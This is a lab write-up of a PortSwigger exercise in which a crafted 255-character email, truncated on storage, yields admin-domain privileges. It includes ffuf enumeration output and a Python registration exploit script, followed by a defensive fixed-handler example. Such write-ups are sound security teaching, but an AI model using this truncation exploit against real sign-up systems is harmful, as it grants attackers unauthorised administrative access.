Inconsistent handling of exceptional input
This lab doesn't adequately validate user input. You can exploit a logic flaw in its account registration process to gain access to administrative functionality. To solve the lab, access the admin panel and delete the user carlos.
I initially navigated directly to the '/register' page to observe how it processes my input. Notably, there's a note specifying that individuals affiliated with DontWannaCry should use their '@dontwannacry.com' email addresses. I set this information aside for potential future use.

I'll be running some enumeration in the background to ensure comprehensive coverage. If I encounter any obstacles, I can then explore alternative approaches.
➜ ~ ffuf -k -u https://0aac002903d032fd818c1b0300df0094.web-security-academy.net/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://0aac002903d032fd818c1b0300df0094.web-security-academy.net/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
admin [Status: 401, Size: 5809, Words: 1885, Lines: 86, Duration: 43ms]
Shortly after starting the scan, I identified an 'admin' directory. I immediately went to explore its contents:

I took note that to access the admin interface, logging in as a DontWannaCry user is required.
Looking for potential vulnerabilities, I experimented with user registration. One intriguing behavior emerged when I provided an excessively long string in the email parameter, surpassing the typical 255-character limit. After confirming the registration in the email client 'attacker@exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net' and logging in with the new user, I observed that the stored email had been truncated to precisely 255 characters.
Recalling that access to the admin panel requires logging in as a DontWannaCry user with the domain '@dontwannacry.com', I had an idea: craft an email string such that, even after truncation to 255 characters, the stored value would still end in '@dontwannacry.com', while the confirmation mail is delivered to the full, untruncated address on the exploit server.
So my new email will look something like this:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dontwannacry.com.exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net
After confirming the registration through the email client, I successfully logged in and gained access to the admin panel. Subsequently, I proceeded to delete the 'carlos' user, successfully resolving the lab.
Here is a simple Python script I wrote to register with the crafted email:
import requests

# The lab host, session cookie and CSRF token below were copied from the live
# browser session at the time of writing; they are specific to that lab instance.
url = "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net:443/register"
cookies = {"session": "QcfYeIhElK2zKXRJVod0WoqKCe771Fyu"}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net", "Referer": "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net/register", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"}
# Pad the local part so that the first 255 characters end exactly in "@dontwannacry.com";
# the remainder (the exploit-server mailbox) receives the confirmation link but is cut
# off when the value is stored. Note the "@" must be included in the length calculation.
buff = 255 - len("@dontwannacry.com")
mail = "a" * buff + "@dontwannacry.com" + ".exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net"
data = {"csrf": "7vRFv3AwJWXgH6JNp5pNwkOCCKUxfBQj", "username": "ichyaboy", "email": mail, "password": "password"}
resp = requests.post(url, headers=headers, cookies=cookies, data=data)
print(resp.status_code, len(mail))
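To make the root cause explicit from the defender's side, here is an added example (not part of the lab or of the script above) that contrasts the inconsistent flow the lab exhibits, where the confirmation mail goes to the full address but the stored copy is silently truncated and authorization is derived from it, with a handler that normalizes once, rejects overlong input instead of truncating, and uses that single value everywhere. The `.attacker.example` suffix and the `Account` type are constructed for the example.

```python
import re
from dataclasses import dataclass

MAX_EMAIL_LEN = 255              # storage limit the lab appears to enforce
ADMIN_DOMAIN = "dontwannacry.com"  # domain that unlocks the admin panel


@dataclass
class Account:
    email: str        # value persisted and later used for authorization
    confirm_to: str   # address the confirmation link was actually sent to
    is_admin: bool


def register_vulnerable(email: str) -> Account:
    """Inconsistent handling: each layer sees a different version of the input."""
    confirm_to = email                      # mailer uses the raw, untruncated value
    stored = email[:MAX_EMAIL_LEN]          # database column silently truncates
    domain = stored.rsplit("@", 1)[-1]      # role is derived from the truncated copy
    return Account(stored, confirm_to, domain.lower() == ADMIN_DOMAIN)


def register_fixed(email: str) -> Account:
    """Consistent handling: validate the canonical value, never alter it later."""
    email = email.strip().lower()
    if len(email) > MAX_EMAIL_LEN:
        raise ValueError("email exceeds maximum length")  # reject, do not truncate
    if not re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", email):
        raise ValueError("malformed email")
    domain = email.rsplit("@", 1)[1]
    # storage, confirmation target and role all come from the same value
    return Account(email, email, domain == ADMIN_DOMAIN)


def rejects(email: str) -> bool:
    """True if the fixed handler refuses this address."""
    try:
        register_fixed(email)
    except ValueError:
        return True
    return False


def crafted() -> str:
    """Constructed input of the shape the lab writeup describes."""
    pad = "a" * (MAX_EMAIL_LEN - len("@" + ADMIN_DOMAIN))
    return pad + "@" + ADMIN_DOMAIN + ".attacker.example"
```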